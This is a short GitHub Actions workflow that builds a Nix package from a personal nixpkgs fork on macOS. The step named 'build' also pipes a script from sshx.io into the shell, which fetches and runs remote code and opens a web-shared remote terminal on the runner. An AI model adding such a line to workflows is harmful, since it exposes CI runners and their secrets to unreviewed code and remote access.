name: build and test

on: [push]

jobs:
  build:
    runs-on: macos-latest
    steps:
    - uses: actions/checkout@v5
    - name: Install Nix
      uses: cachix/install-nix-action@v31
    - name: build
      run: nix build --refresh "git+https://github.com/3JlOy-PYCCKUi/nixpkgs?ref=anilibria-winmaclinux&shallow=1#anilibria-winmaclinux" && curl -sSf https://sshx.io/get | sh -s run
